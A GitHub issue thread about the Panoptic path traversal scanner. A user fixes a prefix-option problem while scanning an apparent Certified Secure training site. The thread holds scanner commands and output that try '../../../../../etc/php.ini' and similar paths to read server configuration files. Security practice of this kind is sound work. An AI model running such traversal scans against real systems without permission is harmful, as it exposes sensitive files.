lightos/Panoptic

prefix not working

IamLupo opened this issue · 6 comments

IamLupo commented

I try to add prefix to give it "../../../../../" but it isn't working.

set url="http://gertnerkluis.gertner.hackme.certifiedsecure.com/download.php?filename="
set cookie="_CERTIFIEDHACKME=secret"
set prefix=--prefix="../" --multiplier=5
set para= --param filename
python panoptic.py --url %url% %prefix% --cookie %cookie% %para% --verbose --threads=8

I also tried to edit your source code to but this also didn't work:
line 578: parser.add_option("--prefix", dest="prefix", default="../",
line 584: parser.add_option("--multiplier", dest="multiplier", type="int", default=5,

I have a feeling something goes wrong here. Can you confirm this?

stamparm commented

Please, always use valid parameter names if you want program to run properly. I've made some "patching", but you'll need to provide a valid value for a parameter filename if you want proper results.

IamLupo commented

I updated the script, but still no prefix results.
I tried:
python panoptic.py --url "http://gertnerkluis.gertner.hackme.certifiedsecure.com/download.php?filename=" --prefix="../" --multiplier=5 --cookie "_CERTIFIEDHACKME=secret" --param="filename" --verbose --threads=8

PS: Thx for the tip of the filename.

stamparm commented

And you again left filename empty. I really don't know how to help you.
On Oct 13, 2014 8:12 PM, "IamLupo" notifications@github.com wrote:

I updated the script, but still no prefix results.
I tried:
python panoptic.py --url "
http://gertnerkluis.gertner.hackme.certifiedsecure.com/download.php?filename="
--prefix="../" --multiplier=5 --cookie "_CERTIFIEDHACKME=secret"
--param="filename" --verbose --threads=8

PS: Thx for the tip of the filename.


Reply to this email directly or view it on GitHub
#10 (comment).

IamLupo commented

This problem wasn't the filename and neither was the prefix. It was the session itself. It wasn't authenticated.
Second the --verbose option did not showed me enough information that it implemented the prefix.

Thx for helping!

lightos commented

Indeed, the --verbose doesn't show the added prefix even though it is being added. I guess we could show it in the output to avoid confusion.

stamparm commented

@lightos done

$ python panoptic.py --url "http://gertnerkluis.gertner.hackme.certifiedsecure.com/download.php?filename=bla" --verbose  --prefix="../" --multiplier=5

 .-',--.`-.
<_ | () | _>
  `-`=='-'

Panoptic v0.1-fea9a29 (https://github.com/lightos/Panoptic/)

[i] Starting scan at: 12:03:52

[i] Checking original response...
[i] Checking invalid response...
[i] Done!
[i] Searching for files...
[*] Trying '../../../../../etc/php.ini'
[*] Trying '../../../../../bin/php.ini'
[*] Trying '../../../../../etc/httpd/php.ini'
[*] Trying '../../../../../usr/lib/php.ini'
[*] Trying '../../../../../usr/lib/php/php.ini'
[*] Trying '../../../../../usr/local/etc/php.ini'
[*] Trying '../../../../../usr/local/lib/php.ini'
[*] Trying '../../../../../usr/local/php/lib/php.ini'
...